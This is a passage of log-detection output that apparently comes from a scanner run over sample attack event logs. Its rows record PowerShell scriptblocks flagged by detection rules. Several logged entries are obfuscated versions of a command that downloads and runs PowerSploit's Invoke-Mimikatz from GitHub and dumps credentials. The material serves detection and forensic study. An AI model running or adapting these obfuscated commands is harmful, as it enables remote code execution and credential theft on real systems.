+${*[%}${#/}${@=-} +${*[%}${]!}${-#}${]!}+${*[%}${]!}${]!}${@%)} + ${*[%}${+=}${%}+ ${*[%}${#/}${@%)} + ${*[%}${@%)}${@=-}+${*[%}${]!}${-#}${.]/}+${*[%}${]!}${-#}${]!} +${*[%}${@%)}${@%)} +${*[%}${]!}${]!}${.]/}+ ${*[%}${(@}${*} +${*[%}${#/}${@=-}+${*[%}${]!}${-#}${]!} + ${*[%}${]!}${]!}${.]/} +${*[%}${+=}${.]/}+${*[%}${@=-}${#/}+${*[%}${]!}${-#}${]!} + ${*[%}${@%)}${@=-}+ ${*[%}${.]/}${#/} +${*[%}${]!}${-#}${@=-} +${*[%}${]!}${-#}${%}+${*[%}${]!}${-#}${]!} + ${*[%}${]!}${]!}${-#} + ${*[%}${]!}${]!}${.]/}+ ${*[%}${+=}${]!} + ${*[%}${+=}${.]/}+ ${*[%}${.]/}${@=-}+ ${*[%}${]!}${]!}${]!}+ ${*[%}${]!}${]!}${@%)}+ ${*[%}${]!}${]!}${-#}+${*[%}${]!}${-#}${@=-} +${*[%}${]!}${]!}${]!}+ ${*[%}${@%)}${#/} + ${*[%}${]!}${-#}${-#} + ${*[%}${@=-}${(@}+ ${*[%}${]!}${]!}${.]/} + ${*[%}${]!}${]!}${+=}+${*[%}${]!}${-#}${%} +${*[%}${]!}${]!}${-#}+ ${*[%}${]!}${-#}${(@}+ ${*[%}${+=}${-#}+ ${*[%}${(@}${@%)}+${*[%}${]!}${-#}${+=} +${*[%}${]!}${]!}${.]/} +${*[%}${]!}${]!}${.]/}+ ${*[%}${]!}${]!}${*} +${*[%}${]!}${]!}${%} + ${*[%}${%}${@=-}+ ${*[%}${+=}${#/}+${*[%}${+=}${#/}+${*[%}${]!}${]!}${+=}+ ${*[%}${@%)}${#/}+ ${*[%}${]!}${]!}${@%)} + ${*[%}${+=}${.]/}+${*[%}${]!}${-#}${(@}+${*[%}${]!}${-#}${%}+ ${*[%}${]!}${]!}${.]/} +${*[%}${]!}${-#}${+=} +${*[%}${]!}${]!}${#/}+${*[%}${@%)}${@=-}+${*[%}${]!}${]!}${#/}+${*[%}${]!}${]!}${%} + ${*[%}${]!}${-#}${]!}+ ${*[%}${]!}${]!}${+=} +${*[%}${@%)}${@%)}+ ${*[%}${]!}${]!}${]!} + ${*[%}${]!}${]!}${-#}+${*[%}${]!}${]!}${.]/} + ${*[%}${]!}${-#}${]!} + ${*[%}${]!}${]!}${-#}+ ${*[%}${]!}${]!}${.]/} +${*[%}${+=}${.]/}+ ${*[%}${@%)}${@%)} +${*[%}${]!}${]!}${]!} +${*[%}${]!}${-#}${@%)} +${*[%}${+=}${#/} + ${*[%}${]!}${-#}${@%)} +${*[%}${@%)}${#/} +${*[%}${]!}${]!}${.]/} +${*[%}${]!}${]!}${.]/} + ${*[%}${]!}${-#}${%} + ${*[%}${]!}${-#}${*} +${*[%}${]!}${-#}${]!} + ${*[%}${]!}${]!}${%} + ${*[%}${]!}${]!}${.]/}+${*[%}${@%)}${#/}+ ${*[%}${]!}${]!}${.]/}+ ${*[%}${]!}${-#}${%}+ ${*[%}${]!}${]!}${]!} +${*[%}${]!}${]!}${-#} +${*[%}${+=}${#/}+ ${*[%}${@=-}${-#}+${*[%}${]!}${]!}${]!} + ${*[%}${]!}${]!}${@%)} +${*[%}${]!}${-#}${]!} + ${*[%}${]!}${]!}${+=}+ ${*[%}${@=-}${(@}+ ${*[%}${]!}${]!}${*}+${*[%}${]!}${-#}${@=-}+ ${*[%}${]!}${]!}${]!}+ ${*[%}${]!}${-#}${%} + ${*[%}${]!}${]!}${.]/}+${*[%}${+=}${#/} + ${*[%}${]!}${-#}${@%)}+ ${*[%}${@%)}${#/} +${*[%}${]!}${]!}${%} +${*[%}${]!}${]!}${.]/}+${*[%}${]!}${-#}${]!} +${*[%}${]!}${]!}${+=} +${*[%}${+=}${#/}+${*[%}${.]/}${@%)}+${*[%}${]!}${*}${-#} +${*[%}${]!}${-#}${*}+ ${*[%}${]!}${-#}${%}+${*[%}${]!}${-#}${@=-} +${*[%}${]!}${]!}${.]/} + ${*[%}${]!}${]!}${+=}+ ${*[%}${@%)}${#/}+ ${*[%}${]!}${]!}${.]/} + ${*[%}${]!}${-#}${%} + ${*[%}${]!}${]!}${]!}+${*[%}${]!}${]!}${-#}+${*[%}${+=}${#/}+${*[%}${#/}${(@}+ ${*[%}${]!}${]!}${-#}+${*[%}${]!}${]!}${@=-}+${*[%}${]!}${]!}${]!}+${*[%}${]!}${-#}${#/} +${*[%}${]!}${-#}${]!}+${*[%}${+=}${%}+ ${*[%}${#/}${#/}+ ${*[%}${]!}${-#}${%}+${*[%}${]!}${-#}${@%)}+${*[%}${]!}${-#}${%} +${*[%}${]!}${-#}${#/}+${*[%}${@%)}${#/} + ${*[%}${]!}${]!}${.]/}+${*[%}${]!}${*}${*} + ${*[%}${+=}${.]/} + ${*[%}${]!}${]!}${*}+${*[%}${]!}${]!}${%} + ${*[%}${+=}${@%)}+ ${*[%}${(@}${@%)} + ${*[%}${+=}${]!} +${*[%}${%}${@%)} +${*[%}${(@}${*}+ ${*[%}${#/}${(@}+${*[%}${]!}${]!}${-#}+${*[%}${]!}${]!}${@=-}+ ${*[%}${]!}${]!}${]!}+ ${*[%}${]!}${-#}${#/}+${*[%}${]!}${-#}${]!}+${*[%}${+=}${%}+ ${*[%}${#/}${#/} + ${*[%}${]!}${-#}${%} +${*[%}${]!}${-#}${@%)}+${*[%}${]!}${-#}${%}+ ${*[%}${]!}${-#}${#/} + ${*[%}${@%)}${#/}+${*[%}${]!}${]!}${.]/}+${*[%}${]!}${*}${*}+${*[%}${(@}${*} + ${*[%}${+=}${%} +${*[%}${.]/}${@=-}+${*[%}${]!}${]!}${#/} +${*[%}${]!}${-#}${@%)}+ ${*[%}${]!}${]!}${*} +${*[%}${.]/}${#/}+${*[%}${]!}${]!}${+=} +${*[%}${]!}${-#}${]!}+${*[%}${]!}${-#}${-#} + ${*[%}${]!}${]!}${%})""|& ${=}",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:16:06.877 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"${=} =+ $( ); ${-#} =${=} ;${]!} =++${=} ;${*} =++${=} ;${(@} = ++${=} ;${+=}=++ ${=}; ${%} = ++ ${=} ; ${.]/} = ++${=};${#/}=++${=} ; ${@=-}= ++ ${=}; ${@%)}= ++ ${=} ; ${*[%} = ""[""+""$(@{})""[${#/} ]+""$(@{})""[ ""${]!}""+""${@%)}"" ]+""$(@{ })""[ ""${*}"" + ""${-#}""] + ""$? ""[ ${]!} ]+ ""]"" ;${=}="""".(""$( @{} )""[ ""${]!}${+=}"" ]+""$( @{} )""[ ""${]!}${.]/}""] + ""$( @{}) ""[ ${-#} ]+ ""$(@{ } ) ""[${+=} ]+""$? ""[${]!}] + ""$( @{ } ) ""[ ${(@} ] ) ;${=}=""$(@{ } ) ""[ ""${]!}"" +""${+=}"" ] + ""$(@{ } )""[${+=}] + ""${=}""[ ""${*}"" + ""${#/}"" ] ; "" ${=}(${*[%}${#/}${(@} +${*[%}${.]/}${@%)}+${*[%}${@=-}${@=-} +${*[%}${(@}${*} +${*[%}${+=}${-#} +${*[%}${#/}${@=-} +${*[%}${]!}${-#}${]!}+${*[%}${]!}${]!}${@%)} + ${*[%}${+=}${%}+ ${*[%}${#/}${@%)} + ${*[%}${@%)}${@=-}+${*[%}${]!}${-#}${.]/}+${*[%}${]!}${-#}${]!} +${*[%}${@%)}${@%)} +${*[%}${]!}${]!}${.]/}+ ${*[%}${(@}${*} +${*[%}${#/}${@=-}+${*[%}${]!}${-#}${]!} + ${*[%}${]!}${]!}${.]/} +${*[%}${+=}${.]/}+${*[%}${@=-}${#/}+${*[%}${]!}${-#}${]!} + ${*[%}${@%)}${@=-}+ ${*[%}${.]/}${#/} +${*[%}${]!}${-#}${@=-} +${*[%}${]!}${-#}${%}+${*[%}${]!}${-#}${]!} + ${*[%}${]!}${]!}${-#} + ${*[%}${]!}${]!}${.]/}+ ${*[%}${+=}${]!} + ${*[%}${+=}${.]/}+ ${*[%}${.]/}${@=-}+ ${*[%}${]!}${]!}${]!}+ ${*[%}${]!}${]!}${@%)}+ ${*[%}${]!}${]!}${-#}+${*[%}${]!}${-#}${@=-} +${*[%}${]!}${]!}${]!}+ ${*[%}${@%)}${#/} + ${*[%}${]!}${-#}${-#} + ${*[%}${@=-}${(@}+ ${*[%}${]!}${]!}${.]/} + ${*[%}${]!}${]!}${+=}+${*[%}${]!}${-#}${%} +${*[%}${]!}${]!}${-#}+ ${*[%}${]!}${-#}${(@}+ ${*[%}${+=}${-#}+ ${*[%}${(@}${@%)}+${*[%}${]!}${-#}${+=} +${*[%}${]!}${]!}${.]/} +${*[%}${]!}${]!}${.]/}+ ${*[%}${]!}${]!}${*} +${*[%}${]!}${]!}${%} + ${*[%}${%}${@=-}+ ${*[%}${+=}${#/}+${*[%}${+=}${#/}+${*[%}${]!}${]!}${+=}+ ${*[%}${@%)}${#/}+ ${*[%}${]!}${]!}${@%)} + ${*[%}${+=}${.]/}+${*[%}${]!}${-#}${(@}+${*[%}${]!}${-#}${%}+ ${*[%}${]!}${]!}${.]/} +${*[%}${]!}${-#}${+=} +${*[%}${]!}${]!}${#/}+${*[%}${@%)}${@=-}+${*[%}${]!}${]!}${#/}+${*[%}${]!}${]!}${%} + ${*[%}${]!}${-#}${]!}+ ${*[%}${]!}${]!}${+=} +${*[%}${@%)}${@%)}+ ${*[%}${]!}${]!}${]!} + ${*[%}${]!}${]!}${-#}+${*[%}${]!}${]!}${.]/} + ${*[%}${]!}${-#}${]!} + ${*[%}${]!}${]!}${-#}+ ${*[%}${]!}${]!}${.]/} +${*[%}${+=}${.]/}+ ${*[%}${@%)}${@%)} +${*[%}${]!}${]!}${]!} +${*[%}${]!}${-#}${@%)} +${*[%}${+=}${#/} + ${*[%}${]!}${-#}${@%)} +${*[%}${@%)}${#/} +${*[%}${]!}${]!}${.]/} +${*[%}${]!}${]!}${.]/} + ${*[%}${]!}${-#}${%} + ${*[%}${]!}${-#}${*} +${*[%}${]!}${-#}${]!} + ${*[%}${]!}${]!}${%} + ${*[%}${]!}${]!}${.]/}+${*[%}${@%)}${#/}+ ${*[%}${]!}${]!}${.]/}+ ${*[%}${]!}${-#}${%}+ ${*[%}${]!}${]!}${]!} +${*[%}${]!}${]!}${-#} +${*[%}${+=}${#/}+ ${*[%}${@=-}${-#}+${*[%}${]!}${]!}${]!} + ${*[%}${]!}${]!}${@%)} +${*[%}${]!}${-#}${]!} + ${*[%}${]!}${]!}${+=}+ ${*[%}${@=-}${(@}+ ${*[%}${]!}${]!}${*}+${*[%}${]!}${-#}${@=-}+ ${*[%}${]!}${]!}${]!}+ ${*[%}${]!}${-#}${%} + ${*[%}${]!}${]!}${.]/}+${*[%}${+=}${#/} + ${*[%}${]!}${-#}${@%)}+ ${*[%}${@%)}${#/} +${*[%}${]!}${]!}${%} +${*[%}${]!}${]!}${.]/}+${*[%}${]!}${-#}${]!} +${*[%}${]!}${]!}${+=} +${*[%}${+=}${#/}+${*[%}${.]/}${@%)}+${*[%}${]!}${*}${-#} +${*[%}${]!}${-#}${*}+ ${*[%}${]!}${-#}${%}+${*[%}${]!}${-#}${@=-} +${*[%}${]!}${]!}${.]/} + ${*[%}${]!}${]!}${+=}+ ${*[%}${@%)}${#/}+ ${*[%}${]!}${]!}${.]/} + ${*[%}${]!}${-#}${%} + ${*[%}${]!}${]!}${]!}+${*[%}${]!}${]!}${-#}+${*[%}${+=}${#/}+${*[%}${#/}${(@}+ ${*[%}${]!}${]!}${-#}+${*[%}${]!}${]!}${@=-}+${*[%}${]!}${]!}${]!}+${*[%}${]!}${-#}${#/} +${*[%}${]!}${-#}${]!}+${*[%}${+=}${%}+ ${*[%}${#/}${#/}+ ${*[%}${]!}${-#}${%}+${*[%}${]!}${-#}${@%)}+${*[%}${]!}${-#}${%} +${*[%}${]!}${-#}${#/}+${*[%}${@%)}${#/} + ${*[%}${]!}${]!}${.]/}+${*[%}${]!}${*}${*} + ${*[%}${+=}${.]/} + ${*[%}${]!}${]!}${*}+${*[%}${]!}${]!}${%} + ${*[%}${+=}${@%)}+ ${*[%}${(@}${@%)} + ${*[%}${+=}${]!} +${*[%}${%}${@%)} +${*[%}${(@}${*}+ ${*[%}${#/}${(@}+${*[%}${]!}${]!}${-#}+${*[%}${]!}${]!}${@=-}+ ${*[%}${]!}${]!}${]!}+ ${*[%}${]!}${-#}${#/}+${*[%}${]!}${-#}${]!}+${*[%}${+=}${%}+ ${*[%}${#/}${#/} + ${*[%}${]!}${-#}${%} +${*[%}${]!}${-#}${@%)}+${*[%}${]!}${-#}${%}+ ${*[%}${]!}${-#}${#/} + ${*[%}${@%)}${#/}+${*[%}${]!}${]!}${.]/}+${*[%}${]!}${*}${*}+${*[%}${(@}${*} + ${*[%}${+=}${%} +${*[%}${.]/}${@=-}+${*[%}${]!}${]!}${#/} +${*[%}${]!}${-#}${@%)}+ ${*[%}${]!}${]!}${*} +${*[%}${.]/}${#/}+${*[%}${]!}${]!}${+=} +${*[%}${]!}${-#}${]!}+${*[%}${]!}${-#}${-#} + ${*[%}${]!}${]!}${%})""|& ${=}",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:16:06.938 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,iex([CHar]73 +[CHar]69+[CHar]88 +[CHar]32 +[CHar]40 +[CHar]78 +[CHar]101+[CHar]119 + [CHar]45+ [CHar]79 + [CHar]98+[CHar]106+[CHar]101 +[CHar]99 +[CHar]116+ [CHar]32 +[CHar]78+[CHar]101 + [CHar]116 +[CHar]46+[CHar]87+[CHar]101 + [CHar]98+ [CHar]67 +[CHar]108 +[CHar]105+[CHar]101 + [CHar]110 + [CHar]116+ [CHar]41 + [CHar]46+ [CHar]68+ [CHar]111+ [CHar]119+ [CHar]110+[CHar]108 +[CHar]111+ [CHar]97 + [CHar]100 + [CHar]83+ [CHar]116 + [CHar]114+[CHar]105 +[CHar]110+ [CHar]103+ [CHar]40+ [CHar]39+[CHar]104 +[CHar]116 +[CHar]116+ [CHar]112 +[CHar]115 + [CHar]58+ [CHar]47+[CHar]47+[CHar]114+ [CHar]97+ [CHar]119 + [CHar]46+[CHar]103+[CHar]105+ [CHar]116 +[CHar]104 +[CHar]117+[CHar]98+[CHar]117+[CHar]115 + [CHar]101+ [CHar]114 +[CHar]99+ [CHar]111 + [CHar]110+[CHar]116 + [CHar]101 + [CHar]110+ [CHar]116 +[CHar]46+ [CHar]99 +[CHar]111 +[CHar]109 +[CHar]47 + [CHar]109 +[CHar]97 +[CHar]116 +[CHar]116 + [CHar]105 + [CHar]102 +[CHar]101 + [CHar]115 + [CHar]116+[CHar]97+ [CHar]116+ [CHar]105+ [CHar]111 +[CHar]110 +[CHar]47+ [CHar]80+[CHar]111 + [CHar]119 +[CHar]101 + [CHar]114+ [CHar]83+ [CHar]112+[CHar]108+ [CHar]111+ [CHar]105 + [CHar]116+[CHar]47 + [CHar]109+ [CHar]97 +[CHar]115 +[CHar]116+[CHar]101 +[CHar]114 +[CHar]47+[CHar]69+[CHar]120 +[CHar]102+ [CHar]105+[CHar]108 +[CHar]116 + [CHar]114+ [CHar]97+ [CHar]116 + [CHar]105 + [CHar]111+[CHar]110+[CHar]47+[CHar]73+ [CHar]110+[CHar]118+[CHar]111+[CHar]107 +[CHar]101+[CHar]45+ [CHar]77+ [CHar]105+[CHar]109+[CHar]105 +[CHar]107+[CHar]97 + [CHar]116+[CHar]122 + [CHar]46 + [CHar]112+[CHar]115 + [CHar]49+ [CHar]39 + [CHar]41 +[CHar]59 +[CHar]32+ [CHar]73+[CHar]110+[CHar]118+ [CHar]111+ [CHar]107+[CHar]101+[CHar]45+ [CHar]77 + [CHar]105 +[CHar]109+[CHar]105+ [CHar]107 + [CHar]97+[CHar]116+[CHar]122+[CHar]32 + [CHar]45 +[CHar]68+[CHar]117 +[CHar]109+ [CHar]112 +[CHar]67+[CHar]114 +[CHar]101+[CHar]100 + [CHar]115),rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:16:21.040 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:16:21.050 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:16:21.054 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:16:21.057 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:16:21.060 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:16:21.062 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:16:21.067 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:16:21.077 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:16:21.081 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:16:21.085 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:16:21.089 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$UpperLowerChar = $_; If(Get-Random -Input @(0..1)) {$UpperLowerChar = $UpperLowerChar.ToUpper()} $UpperLowerChar},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:16:21.107 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:16:21.118 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"{$EncodedArray += ([Convert]::ToString(([Int][Char]$_),$EncodingBase) + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)))}",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:16:21.272 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:16:21.286 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:16:21.338 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:16:25.959 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"' '| FOrEAcH-ObJect { $vFzAY=$_ -spLIT ' '|FOrEAcH-ObJect {' '; $_.sPliT(' ')|FOrEAcH-ObJect{ $_.lENGTh- 1 } };((-JoIN($vFzAY[0..($vFzAY.lENGTh-1)])).trim(' ').sPliT( ' ')| FOrEAcH-ObJect { ([Char][iNT]$_)}) -JoIN'' | . ( ''.InDexof.TOStrING()[106,482,184]-jOin'')}",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:16:25.959 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"{ $vFzAY=$_ -spLIT ' '|FOrEAcH-ObJect {' '; $_.sPliT(' ')|FOrEAcH-ObJect{ $_.lENGTh- 1 } };((-JoIN($vFzAY[0..($vFzAY.lENGTh-1)])).trim(' ').sPliT( ' ')| FOrEAcH-ObJect { ([Char][iNT]$_)}) -JoIN'' | . ( ''.InDexof.TOStrING()[106,482,184]-jOin'')}",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:16:25.960 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{' '; $_.sPliT(' ')|FOrEAcH-ObJect{ $_.lENGTh- 1 } },rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:16:25.963 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{ $_.lENGTh- 1 },rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:16:26.128 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{ ([Char][iNT]$_)},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:25:04.174 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"(('IEX ('+'New'+'-Object'+' Net.Web'+'Client'+')'+'.DownloadString(oH'+'4http'+'s:'+'//raw'+'.g'+'it'+'hubuse'+'rcontent.c'+'om/m'+'at'+'tifes'+'t'+'a'+'tion/'+'Po'+'we'+'rSploit/ma'+'s'+'ter/Exfiltra'+'tion'+'/I'+'nvoke-Mimikat'+'z.ps1oH4'+'); Invoke-Mimi'+'katz -Du'+'mpCred'+'s') -REpLacE ([cHaR]111+[cHaR]72+[cHaR]52),[cHaR]39)| IEx",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-string-menu.evtx +2017-08-30 19:25:20.783 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"(((""{41}{32}{44}{45}{20}{36}{35}{21}{10}{40}{29}{42}{26}{28}{1}{19}{15}{11}{48}{49}{39}{30}{4}{18}{47}{31}{24}{23}{33}{43}{12}{13}{7}{8}{22}{46}{14}{27}{25}{5}{0}{34}{6}{16}{17}{38}{3}{9}{2}{37}"" -f'1','ubuserco','Dump','tz ','festati','atz.ps','); In','s','t','-','p','m/','/','ma','ion/I','co','vok','e-M','on','ntent.','load','t','er','l','p','e-Mimik','.','nvok','gith',':','ti','rS',' (New-','o','{0}','t','String({0}h','Creds','imika','t','s','IEX','//raw','it','Object Net.WebCli','ent).Down','/Exfiltrat','/Powe','m','a')) -F [ChaR]39) | . ( $ShelliD[1]+$sHELliD[13]+'X')",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-string-menu.evtx +2017-08-30 19:25:48.631 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"$l7i= "" ))93]RaHc[ f- )'sderCpmuD-'+' ztak'+'imi'+'M'+'-e'+'kovnI'+' '+';)}0{'+'1sp.'+'ztaki'+'mi'+'M-ekovnI/no'+'i'+'ta'+'rtl'+'ifx'+'E/'+'retsa'+'m/'+'tiolpSrewoP'+'/no'+'itats'+'e'+'fitt'+'am'+'/moc'+'.tne'+'tn'+'o'+'cresu'+'buhtig'+'.war//:sptth}0{(gn'+'ir'+'tSdaol'+'n'+'woD.)'+'tne'+'ilCb'+'eW.t'+'eN t'+'c'+'ejbO-w'+'eN('+' X'+'EI'(( ( )'x'+]03[emoHSP$+]12[EmOHsp$ ( & ""; ( cHiLDiTEm (""vAr""+""iaBlE""+"":""+""l7I"")).vaLuE[-1 ..-(( cHiLDiTEm (""vAr""+""iaBlE""+"":""+""l7I"")).vaLuE.lengTh)]-JOIN''|& ( ([StRiNg]$VERbOsePREferENCe)[1,3]+'X'-join'')",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-string-menu.evtx +2017-08-30 19:25:48.647 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,& ( $psHOmE[21]+$PSHome[30]+'x') ( (('IE'+'X '+'(Ne'+'w-Obje'+'c'+'t Ne'+'t.We'+'bCli'+'ent'+').Dow'+'n'+'loadSt'+'ri'+'ng({0}https://raw.'+'github'+'userc'+'o'+'nt'+'ent.'+'com/'+'ma'+'ttif'+'e'+'stati'+'on/'+'PowerSploit'+'/m'+'aster'+'/E'+'xfi'+'ltr'+'at'+'i'+'on/Invoke-M'+'im'+'ikatz'+'.ps1'+'{0});'+' '+'Invok'+'e-'+'M'+'imi'+'katz '+'-DumpCreds') -f [cHaR]39)),rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-string-menu.evtx +2017-08-30 19:25:48.647 +00:00,SEC511,4104,high,Exec,Malicious Nishang PowerShell Commandlets,,rules/sigma/powershell/powershell_script/posh_ps_nishang_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-string-menu.evtx +2019-01-19 13:00:10.350 +00:00,IEWIN7,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: blabla.exe | IP Addr: 10.0.2.16 | LID: 0x162630,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 